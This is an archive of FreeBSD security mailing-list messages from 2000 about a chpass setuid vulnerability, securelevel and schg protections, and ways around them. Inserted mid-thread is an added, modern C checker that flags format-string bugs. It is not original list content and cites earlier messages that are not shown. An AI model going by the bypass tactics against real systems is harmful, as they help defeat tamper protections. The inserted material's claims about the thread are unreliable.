Jeff Mountin - jeff@mountin.net Systems/Network Administrator FreeBSD - the power to serve To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 0: 8:41 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 932B737B502; Wed, 4 Oct 2000 00:08:31 -0700 (PDT) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e9478Rf29652; Wed, 4 Oct 2000 00:08:27 -0700 (PDT) Date: Wed, 4 Oct 2000 00:08:27 -0700 From: Alfred Perlstein To: Nate Williams Cc: Kris Kennaway , Jordan Hubbard , Paul Richards , Christopher Masto , Warner Losh , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: How long for -stable [ Re: cvs commit: src/usr.bin/finger finger.c ] Message-ID: <20001004000827.B27736@fw.wintelcom.net> References: <85378.970625261@winston.osd.bsdi.com> <20001003192158.A14805@freefall.freebsd.org> <200010040349.VAA27923@nomad.yogotech.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: <200010040349.VAA27923@nomad.yogotech.com>; from nate@yogotech.com on Tue, Oct 03, 2000 at 09:49:02PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Nate Williams [001003 20:50] wrote: > > The idea of supporting 2.x fixes isn't fundamentally unsound either, > > it's just that no-one cares enough to do the work. > > For what it's worth, I've got a couple of backported kernel fixes on my > box (including at least one security fix) that are there because I am > stuck on 2.2 due to hardware issues, as well as the fact that it simply > 'works'. > > However, I didn't bother making the fix available because I felt it > might give people the wrong impression. 
Just because *I* am willing to > support a really old release such as FreeBSD 2, I still feel the users > should be 'encouraged' to use newer releases. By not making those fixes > available (which were in fact rather trivial to do), those folks who > aren't capable of fixing the bugs will be more likely to upgrade their > systems to a newer 'more supported' release. > > I think supporting older releases *really* needs to be done by a > commercial entity (or at least folks who have a commercial stake in > seeing it done), since the majority of developers are in it for the > development fun, and product support is all but fun. :( I think it's a bit selfish of you to keep these fixes to yourself, and it's the wrong attitude to have especially if you're confident about a fix, there's always people stuck with ancient releases in production and could use the help. thanks, -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." 
From owner-freebsd-security Wed Oct 4 0:13: 4 2000
Delivered-To: freebsd-security@freebsd.org
Received: from static.unixfreak.org (static.unixfreak.org [63.198.170.139]) by hub.freebsd.org (Postfix) with ESMTP id 9048A37B503 for ; Wed, 4 Oct 2000 00:13:00 -0700 (PDT)
Received: by static.unixfreak.org (Postfix, from userid 1000) id 8A3901F19; Tue, 3 Oct 2000 22:34:22 -0700 (PDT)
Subject: Re: BSD chpass (fwd)
In-Reply-To: from Mike Silbersack at "Oct 4, 2000 00:16:45 am"
To: Mike Silbersack
Date: Tue, 3 Oct 2000 22:34:22 -0700 (PDT)
Cc: security@freebsd.org
From: Dima Dorfman
Reply-To: dima@unixfreak.org
X-Mailer: ELM [version 2.4ME+ PL61 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-Id: <20001004053422.8A3901F19@static.unixfreak.org>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> For those not subscribed to bugtraq, it's time to remove the suid bit on
> chpass.

Unfortunately it isn't that easy if you're running with securelevel > 0 since chpass is installed with the schg (system immutable) flag on by default. Oh well, guess it's time to reboot some hosts. :-/

--
Dima Dorfman
Finger dima@unixfreak.org for my public PGP key.
If only God would give me some clear sign! Like making a large deposit in my name at a Swiss bank.
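Removing the suid bit is the stopgap; the actual fix Peter Wemm and Brett Glass traced earlier in this thread (pw_util.c rev 1.18, "Don't call warn() without a format string") closes one instance of a whole bug class: a printf-style function whose format argument is data rather than a literal. The following is an added example, not code from this thread or from the FreeBSD tree: a small C checker that flags source lines calling a printf/err/warn-family function with a non-literal format argument. The function table and the sample source lines are constructed for the example; the samples imitate the warn(buf) pattern but are not lines from pw_util.c.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* printf-style functions and the 0-based index of their format argument.
 * Constructed for this example; extend it (vwarn, vsyslog, ...) as needed. */
struct fmt_func { const char *name; int fmt_arg; };

static const struct fmt_func fmt_funcs[] = {
    {"printf", 0}, {"warn", 0}, {"warnx", 0},
    {"fprintf", 1}, {"sprintf", 1}, {"err", 1}, {"errx", 1}, {"syslog", 1},
    {"snprintf", 2},
    {NULL, 0}
};

static int is_ident(int c) { return isalnum(c) || c == '_'; }

/* Pointer to 0-based argument `idx` of the call whose '(' is at `open`,
 * or NULL if the call has fewer arguments.  Commas inside string
 * literals or nested parentheses do not count as separators.  Calls that
 * span several source lines are outside what this heuristic handles. */
static const char *nth_arg(const char *open, int idx)
{
    const char *p = open + 1, *start;
    int depth = 0, in_str = 0, n = 0;

    while (isspace((unsigned char)*p)) p++;
    start = p;
    for (; *p; p++) {
        if (in_str) {
            if (*p == '\\' && p[1]) p++;       /* skip the escaped char */
            else if (*p == '"') in_str = 0;
            continue;
        }
        if (*p == '"') in_str = 1;
        else if (*p == '(') depth++;
        else if (*p == ')') {
            if (depth == 0) break;             /* end of this call */
            depth--;
        } else if (*p == ',' && depth == 0) {
            if (n == idx) return start;
            n++;
            start = p + 1;
            while (isspace((unsigned char)*start)) start++;
        }
    }
    return (n == idx && p > start) ? start : NULL;
}

/* Returns 1 if `line` calls one of fmt_funcs with a format argument that
 * is not a string literal (the warn(buf) pattern), 0 otherwise. */
int nonliteral_format_call(const char *line)
{
    const struct fmt_func *f;
    for (f = fmt_funcs; f->name; f++) {
        size_t len = strlen(f->name);
        const char *s = line;
        while ((s = strstr(s, f->name)) != NULL) {
            const char *after = s + len, *q = after;
            /* must be a whole identifier, followed by '(' */
            if ((s == line || !is_ident((unsigned char)s[-1])) &&
                !is_ident((unsigned char)*after)) {
                while (isspace((unsigned char)*q)) q++;
                if (*q == '(') {
                    const char *arg = nth_arg(q, f->fmt_arg);
                    if (arg && *arg != '"') return 1;
                }
            }
            s = after;
        }
    }
    return 0;
}

/* Constructed sample lines modelled on the bug class in the thread (a warn()
 * whose only argument is data, not a format); not lines from pw_util.c. */
static const char *const sample[] = {
    "\twarn(buf);",                                   /* flagged */
    "\twarn(\"%s\", buf);",                           /* the fixed form */
    "\tsnprintf(line, sizeof(line), tmpl);",          /* flagged */
    "\tprintf(\"%s: done (%d)\\n\", name, n);",
    "\terr(1, \"%s: %s\", prog, strerror(errno));",
    "\tsyslog(LOG_ERR, msg);",                        /* flagged */
    "\tfprintf(stderr, \"usage: %s\\n\", prog);",
    NULL
};

/* Scan the sample; returns the number of suspicious calls found (3 here). */
int scan_sample(void)
{
    int i, flagged = 0;
    for (i = 0; sample[i]; i++)
        if (nonliteral_format_call(sample[i])) {
            printf("non-literal format:%s\n", sample[i]);
            flagged++;
        }
    return flagged;
}

int main(void)
{
    printf("%d suspicious call(s)\n", scan_sample());
    return 0;
}
```

The checker is a line-oriented heuristic for a quick pass over a tree; it does not see through macros or calls broken across lines. GCC and Clang perform the same check at compile time with -Wformat-security, which is the setting to turn on for setuid code like chpass so that a warn(buf) cannot be committed silently again.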
From owner-freebsd-security Wed Oct 4 2:11:10 2000
Delivered-To: freebsd-security@freebsd.org
Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id CA4B937B502 for ; Wed, 4 Oct 2000 02:11:06 -0700 (PDT)
Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13gkZs-0000tm-00; Wed, 04 Oct 2000 11:11:04 +0200
Date: Wed, 4 Oct 2000 11:11:04 +0200 (IST)
From: Roman Shterenzon
To: Garrett Wollman
Cc: security@FreeBSD.ORG
Subject: blackhole [was: Re: cvs commit: src/etc inetd.conf]
In-Reply-To: <200010031722.NAA41823@khavrinen.lcs.mit.edu>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, 3 Oct 2000, Garrett Wollman wrote:
>
> If net.inet.tcp.blackhole is set, an RST will not be emitted.

I found it breaks a couple of things in gnome as well. I still don't see any reason for a gnome application to try to connect to some ports, when even in orbitrc the ipv4 and ipv6 are disabled, but it's a fact. This is a gnome problem however. FreeBSD-GNOME guy, can you hear me ? :)

--Roman Shterenzon, UNIX System Administrator and Consultant
[ Xpert UNIX Systems Ltd., Herzlia, Israel.
Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 2:14:29 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E54A837B502; Wed, 4 Oct 2000 02:14:26 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA74895; Wed, 4 Oct 2000 02:14:26 -0700 (PDT) (envelope-from kris@FreeBSD.org) Date: Wed, 4 Oct 2000 02:14:26 -0700 From: Kris Kennaway To: Dima Dorfman Cc: Mike Silbersack , security@freebsd.org Subject: Re: BSD chpass (fwd) Message-ID: <20001004021426.A74690@freefall.freebsd.org> References: <20001004053422.8A3901F19@static.unixfreak.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001004053422.8A3901F19@static.unixfreak.org>; from dima@unixfreak.org on Tue, Oct 03, 2000 at 10:34:22PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 03, 2000 at 10:34:22PM -0700, Dima Dorfman wrote: > > For those not subscribed to bugtraq, it's time to remove the suid bit on > > chpass. > > Unfortunatly it isn't that easy if you're running with securelevel > 0 > since chpass is installed with the schg (system immutable) flag on by > default. Oh well, guess it's time to reboot some hosts. :-/ mv it into a mode 000 directory :-) Kris -- In God we Trust -- all others must submit an X.509 certificate. 
-- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 2:15:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 642CA37B503; Wed, 4 Oct 2000 02:15:31 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA75314; Wed, 4 Oct 2000 02:15:31 -0700 (PDT) (envelope-from kris@FreeBSD.org) Date: Wed, 4 Oct 2000 02:15:31 -0700 From: Kris Kennaway To: Kris Kennaway Cc: Dima Dorfman , Mike Silbersack , security@freebsd.org Subject: Re: BSD chpass (fwd) Message-ID: <20001004021531.B74690@freefall.freebsd.org> References: <20001004053422.8A3901F19@static.unixfreak.org> <20001004021426.A74690@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001004021426.A74690@freefall.freebsd.org>; from kris@FreeBSD.org on Wed, Oct 04, 2000 at 02:14:26AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Oct 04, 2000 at 02:14:26AM -0700, Kris Kennaway wrote: > On Tue, Oct 03, 2000 at 10:34:22PM -0700, Dima Dorfman wrote: > > > For those not subscribed to bugtraq, it's time to remove the suid bit on > > > chpass. > > > > Unfortunatly it isn't that easy if you're running with securelevel > 0 > > since chpass is installed with the schg (system immutable) flag on by > > default. Oh well, guess it's time to reboot some hosts. :-/ > > mv it into a mode 000 directory :-) Oops, can't do that. Reboot :) Kris -- In God we Trust -- all others must submit an X.509 certificate. 
-- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 2:17: 3 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 9DD7137B502; Wed, 4 Oct 2000 02:16:59 -0700 (PDT) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e949GxQ02945; Wed, 4 Oct 2000 02:16:59 -0700 (PDT) Date: Wed, 4 Oct 2000 02:16:59 -0700 From: Alfred Perlstein To: Kris Kennaway Cc: Dima Dorfman , Mike Silbersack , security@FreeBSD.ORG Subject: Re: BSD chpass (fwd) Message-ID: <20001004021658.F27736@fw.wintelcom.net> References: <20001004053422.8A3901F19@static.unixfreak.org> <20001004021426.A74690@freefall.freebsd.org> <20001004021531.B74690@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: <20001004021531.B74690@freefall.freebsd.org>; from kris@FreeBSD.ORG on Wed, Oct 04, 2000 at 02:15:31AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Kris Kennaway [001004 02:15] wrote: > On Wed, Oct 04, 2000 at 02:14:26AM -0700, Kris Kennaway wrote: > > On Tue, Oct 03, 2000 at 10:34:22PM -0700, Dima Dorfman wrote: > > > > For those not subscribed to bugtraq, it's time to remove the suid bit on > > > > chpass. > > > > > > Unfortunatly it isn't that easy if you're running with securelevel > 0 > > > since chpass is installed with the schg (system immutable) flag on by > > > default. Oh well, guess it's time to reboot some hosts. :-/ > > > > mv it into a mode 000 directory :-) > > Oops, can't do that. Reboot :) Can you mount something over it? -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." 
From owner-freebsd-security Wed Oct 4 2:19:51 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 04C9A37B503; Wed, 4 Oct 2000 02:19:49 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA76923; Wed, 4 Oct 2000 02:19:48 -0700 (PDT) (envelope-from kris@FreeBSD.org) Date: Wed, 4 Oct 2000 02:19:48 -0700 From: Kris Kennaway To: Alfred Perlstein Cc: Kris Kennaway , Dima Dorfman , Mike Silbersack , security@FreeBSD.ORG Subject: Re: BSD chpass (fwd) Message-ID: <20001004021948.A76230@freefall.freebsd.org> References: <20001004053422.8A3901F19@static.unixfreak.org> <20001004021426.A74690@freefall.freebsd.org> <20001004021531.B74690@freefall.freebsd.org> <20001004021658.F27736@fw.wintelcom.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001004021658.F27736@fw.wintelcom.net>; from bright@wintelcom.net on Wed, Oct 04, 2000 at 02:16:59AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Oct 04, 2000 at 02:16:59AM -0700, Alfred Perlstein wrote: > * Kris Kennaway [001004 02:15] wrote: > > On Wed, Oct 04, 2000 at 02:14:26AM -0700, Kris Kennaway wrote: > > > On Tue, Oct 03, 2000 at 10:34:22PM -0700, Dima Dorfman wrote: > > > > > For those not subscribed to bugtraq, it's time to remove the suid bit on > > > > > chpass. > > > > > > > > Unfortunately it isn't that easy if you're running with securelevel > 0 > > > > since chpass is installed with the schg (system immutable) flag on by > > > > default. Oh well, guess it's time to reboot some hosts. :-/ > > > > > > mv it into a mode 000 directory :-) > > > > Oops, can't do that. Reboot :) > > Can you mount something over it?
Hmm, now that null mounts work in -current you could, actually - make a copy of /usr/bin except for chpass in say /usr/bin2 and null mount it on /usr/bin. Except securelevel disallows mounts, I think :) Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe From owner-freebsd-security Wed Oct 4 2:28: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from static.unixfreak.org (static.unixfreak.org [63.198.170.139]) by hub.freebsd.org (Postfix) with ESMTP id 72FC937B66C; Wed, 4 Oct 2000 02:27:58 -0700 (PDT) Received: by static.unixfreak.org (Postfix, from userid 1000) id 335931F0A; Wed, 4 Oct 2000 02:27:58 -0700 (PDT) Subject: Re: BSD chpass (fwd) In-Reply-To: <20001004021948.A76230@freefall.freebsd.org> from Kris Kennaway at "Oct 4, 2000 02:19:48 am" To: Kris Kennaway Date: Wed, 4 Oct 2000 02:27:58 -0700 (PDT) Cc: Alfred Perlstein , Kris Kennaway , Dima Dorfman , Mike Silbersack , security@FreeBSD.ORG From: Dima Dorfman Reply-To: dima@unixfreak.org X-Mailer: ELM [version 2.4ME+ PL61 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Message-Id: <20001004092758.335931F0A@static.unixfreak.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On Wed, Oct 04, 2000 at 02:16:59AM -0700, Alfred Perlstein wrote: > > * Kris Kennaway [001004 02:15] wrote: > > > On Wed, Oct 04, 2000 at 02:14:26AM -0700, Kris Kennaway wrote: > > > > On Tue, Oct 03, 2000 at 10:34:22PM -0700, Dima Dorfman wrote: > > > > > > For those not subscribed to bugtraq, it's time to remove the suid bit on > > > > > > chpass. > > > > > > > > > > Unfortunately it isn't that easy if you're running with securelevel > 0 > > > > > since chpass is installed with the schg (system immutable) flag on by > > > > > default. Oh well, guess it's time to reboot some hosts.
:-/ > > > > > > > > mv it into a mode 000 directory :-) > > > > > > Oops, can't do that. Reboot :) > > > > Can you mount something over it? > > Hmm, now that null mounts work in -current you could, actually - make a > copy of /usr/bin except for chpass in say /usr/bin2 and null mount > it Actually, I think you can do it without null mounts. mv /usr/bin /usr/bin2, chmod 000 /usr/bin2, then remake /usr/bin (without chpass, of course). > on /usr/bin. Except securelevel disallows mounts, I think :) In securelevel >= 2, you can't open a disk for writing unless you're mount(2). I don't know much about null mounts, so I don't know if that will prevent them from working. -- Dima Dorfman Finger dima@unixfreak.org for my public PGP key. "War doesn't determine who's right, it determines who's left." -- Confucius From owner-freebsd-security Wed Oct 4 2:32:53 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BBC7B37B66C; Wed, 4 Oct 2000 02:32:49 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA81888; Wed, 4 Oct 2000 02:32:49 -0700 (PDT) (envelope-from kris@FreeBSD.org) Date: Wed, 4 Oct 2000 02:32:49 -0700 From: Kris Kennaway To: Dima Dorfman Cc: Kris Kennaway , Alfred Perlstein , Mike Silbersack , security@FreeBSD.ORG Subject: Re: BSD chpass (fwd) Message-ID: <20001004023249.B76230@freefall.freebsd.org> References: <20001004021948.A76230@freefall.freebsd.org> <20001004092758.335931F0A@static.unixfreak.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001004092758.335931F0A@static.unixfreak.org>; from dima@unixfreak.org on Wed, Oct 04, 2000 at 02:27:58AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop:
FreeBSD.org On Wed, Oct 04, 2000 at 02:27:58AM -0700, Dima Dorfman wrote: > Actually, I think you can do it without null mounts. mv /usr/bin > /usr/bin2, chmod 000 /usr/bin2, then remake /usr/bin (without chpass, > of course). I think you're right. Which is a good reason why your /usr/bin should be schg too ;-) Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe From owner-freebsd-security Wed Oct 4 2:58:38 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A537437B503; Wed, 4 Oct 2000 02:58:36 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA90908; Wed, 4 Oct 2000 02:58:36 -0700 (PDT) (envelope-from kris@FreeBSD.org) Date: Wed, 4 Oct 2000 02:58:36 -0700 From: Kris Kennaway To: Dima Dorfman Cc: Kris Kennaway , Alfred Perlstein , Mike Silbersack , security@FreeBSD.ORG Subject: Re: BSD chpass (fwd) Message-ID: <20001004025836.A84165@freefall.freebsd.org> References: <20001004021948.A76230@freefall.freebsd.org> <20001004092758.335931F0A@static.unixfreak.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001004092758.335931F0A@static.unixfreak.org>; from dima@unixfreak.org on Wed, Oct 04, 2000 at 02:27:58AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Oct 04, 2000 at 02:27:58AM -0700, Dima Dorfman wrote: > In securelevel >= 2, you can't open a disk for writing unless you're > mount(2). I don't know much about null mounts, so I don't know if > that will prevent them from working. mounting is still allowed at all securelevels, so you could also null mount over the top of /usr/bin even if /usr/bin is schg.
The fact that you can mount volumes at high securelevel seems to mean there is no way you can protect a running system against tampering with a given file (i.e. replacing the runtime-visible instance of a given file). Robert Watson would probably start talking about MAC about now :-) but I'm not sure if this is something which should be fixed as a security problem, or if it is just not practical to expect securelevels to prevent run-time tampering of a given file (leaving aside the issues of protecting the boot path against taking control of the machine at next reboot time, which only happens as a result of incomplete coverage of the relevant files and directories with schg) Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe From owner-freebsd-security Wed Oct 4 3: 9: 2 2000 Delivered-To: freebsd-security@freebsd.org Received: from static.unixfreak.org (static.unixfreak.org [63.198.170.139]) by hub.freebsd.org (Postfix) with ESMTP id 8722337B502; Wed, 4 Oct 2000 03:08:59 -0700 (PDT) Received: by static.unixfreak.org (Postfix, from userid 1000) id 33A4A1F0A; Wed, 4 Oct 2000 03:08:59 -0700 (PDT) Subject: Re: BSD chpass (fwd) In-Reply-To: <20001004023249.B76230@freefall.freebsd.org> from Kris Kennaway at "Oct 4, 2000 02:32:49 am" To: Kris Kennaway Date: Wed, 4 Oct 2000 03:08:59 -0700 (PDT) Cc: Dima Dorfman , Alfred Perlstein , Mike Silbersack , security@FreeBSD.ORG From: Dima Dorfman Reply-To: dima@unixfreak.org X-Mailer: ELM [version 2.4ME+ PL61 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Message-Id: <20001004100859.33A4A1F0A@static.unixfreak.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On Wed, Oct 04, 2000 at 02:27:58AM -0700, Dima Dorfman wrote: > > > Actually, I think you can do it without null mounts.
mv /usr/bin > > /usr/bin2, chmod 000 /usr/bin2, then remake /usr/bin (without chpass, > > of course). > > I think you're right. Which is a good reason why your /usr/bin should > be schg too ;-) Then it'd become: mv /usr /usr2, cp everything from /usr2 to /usr except for bin, etc. You get the idea. It does deter them a little bit, though. I usually set /bin, /sbin, /modules (or /boot/kernel in -current), and /boot schg and not worry too much about /usr/[s]bin. IMO, the bottom line is, schg can only prevent an attacker if they don't have a good understanding of the system (which accounts for most of the script kid population). A really clever attacker would modify your securelevel settings in rc.conf, reboot the machine making it look like a panic or power surge (if they know you exclusively access it remotely), fool around, then change it back. Tripwire on a r/o disk would tell you about it, but you can't do that remotely unless you plan on never touching any system binaries. Or am I missing something? -- Dima Dorfman Finger dima@unixfreak.org for my public PGP key. "I had a terrible education. I attended a school for emotionally disturbed teachers." -- Woody Allen From owner-freebsd-security Wed Oct 4 3:11:10 2000 Delivered-To: freebsd-security@freebsd.org Received: from gera.nns.ru (gera.nns.ru [195.230.79.10]) by hub.freebsd.org (Postfix) with ESMTP id 8C3A737B503; Wed, 4 Oct 2000 03:11:03 -0700 (PDT) Received: from falcon.nns.ru (daemon@falcon.nns.ru [195.230.79.70]) by gera.nns.ru (8.9.3/8.9.3) with ESMTP id OAA97236; Wed, 4 Oct 2000 14:10:37 +0400 (MSD) (envelope-from abc@nns.ru) Received: from localhost (localhost [127.0.0.1]) by falcon.nns.ru (8.9.3/8.9.3) with ESMTP id OAA11902; Wed, 4 Oct 2000 14:10:12 +0400 (MSD) (envelope-from abc@nns.ru) Date: Wed, 4 Oct 2000 14:10:12 +0400 (MSD) From: "Andrey V.
Sokolov" To: Dima Dorfman Cc: Kris Kennaway , Alfred Perlstein , Mike Silbersack , security@FreeBSD.ORG Subject: Re: BSD chpass (fwd) In-Reply-To: <20001004092758.335931F0A@static.unixfreak.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi! Do not forget! chpass, chfn, chsh, ypchpass, ypchfn, ypchsh are hard links! This exploit will work with any command from this set, if a little modification of the exploit's code is done. -- Regards, Andrey V. Sokolov On Wed, 4 Oct 2000, Dima Dorfman wrote: >> On Wed, Oct 04, 2000 at 02:16:59AM -0700, Alfred Perlstein wrote: >> > * Kris Kennaway [001004 02:15] wrote: >> > > On Wed, Oct 04, 2000 at 02:14:26AM -0700, Kris Kennaway wrote: >> > > > On Tue, Oct 03, 2000 at 10:34:22PM -0700, Dima Dorfman wrote: >> > > > > > For those not subscribed to bugtraq, it's time to remove the suid bit on >> > > > > > chpass. >> > > > > >> > > > > Unfortunately it isn't that easy if you're running with securelevel > 0 >> > > > > since chpass is installed with the schg (system immutable) flag on by >> > > > > default. Oh well, guess it's time to reboot some hosts. :-/ >> > > > >> > > > mv it into a mode 000 directory :-) >> > > >> > > Oops, can't do that. Reboot :) >> > >> > Can you mount something over it? >> >> Hmm, now that null mounts work in -current you could, actually - make a >> copy of /usr/bin except for chpass in say /usr/bin2 and null mount >> it > >Actually, I think you can do it without null mounts. mv /usr/bin >/usr/bin2, chmod 000 /usr/bin2, then remake /usr/bin (without chpass, >of course). > >> on /usr/bin. Except securelevel disallows mounts, I think :) > >In securelevel >= 2, you can't open a disk for writing unless you're >mount(2). I don't know much about null mounts, so I don't know if >that will prevent them from working.
From owner-freebsd-security Wed Oct 4 3:22:41 2000 Delivered-To: freebsd-security@freebsd.org Received: from static.unixfreak.org (static.unixfreak.org [63.198.170.139]) by hub.freebsd.org (Postfix) with ESMTP id B5DF837B66C; Wed, 4 Oct 2000 03:22:39 -0700 (PDT) Received: by static.unixfreak.org (Postfix, from userid 1000) id 780551F0D; Wed, 4 Oct 2000 03:22:39 -0700 (PDT) Subject: Re: BSD chpass (fwd) In-Reply-To: from "Andrey V. Sokolov" at "Oct 4, 2000 02:10:12 pm" To: "Andrey V. Sokolov" Date: Wed, 4 Oct 2000 03:22:39 -0700 (PDT) Cc: Dima Dorfman , Kris Kennaway , Alfred Perlstein , Mike Silbersack , security@FreeBSD.ORG From: Dima Dorfman Reply-To: dima@unixfreak.org X-Mailer: ELM [version 2.4ME+ PL61 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Message-Id: <20001004102239.780551F0D@static.unixfreak.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Hi! > Do not forget! chpass, chfn, chsh, ypchpass, ypchfn, ypchsh are hard > links! This exploit will work with any command from this set, if a > little modification of the exploit's code is done. And since they're hard links, when you [un]set the modes for one, the others get it too. In other words, unless you go out of your way to keep chfn/chsh/etc. setuid to root, chmod 555 `which chpass` is sufficient. -- Dima Dorfman Finger dima@unixfreak.org for my public PGP key. "Reading and writing, arithmetic and grammar do not constitute education, any more than a knife, fork and spoon constitute a dinner."
-- John Lubbock From owner-freebsd-security Wed Oct 4 3:23:30 2000 Delivered-To: freebsd-security@freebsd.org Received: from green.dyndns.org (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with ESMTP id 74F6337B66C; Wed, 4 Oct 2000 03:23:24 -0700 (PDT) Received: from localhost (z2i384@localhost [127.0.0.1] (may be forged)) by green.dyndns.org (8.11.0/8.11.0) with ESMTP id e94ANE507903; Wed, 4 Oct 2000 06:23:16 -0400 (EDT) (envelope-from green@FreeBSD.org) Message-Id: <200010041023.e94ANE507903@green.dyndns.org> X-Mailer: exmh version 2.2 06/23/2000 with nmh-1.0.4 To: Kris Kennaway Cc: Warner Losh , Paul Richards , cvs-committers@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: cvs commit: src/usr.bin/finger finger.c In-Reply-To: Message from Kris Kennaway of "Tue, 03 Oct 2000 16:27:20 PDT." <20001003162720.D51546@freefall.freebsd.org> From: "Brian F. Feldman" Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 04 Oct 2000 06:23:13 -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway wrote: > On Tue, Oct 03, 2000 at 12:00:57PM -0600, Warner Losh wrote: > > In message <39DA182C.C70ED553@originative.co.uk> Paul Richards writes: > > : I think we should have a stable release team, that changes to the stable > > : branch should be gated through to ensure they're thoroughly tested and > > : that there's a need for them to be backported. I'd be happy to work with > > : anyone else who wants to volunteer to do that since maintaining a stable > > : version of the OS is a major issue for 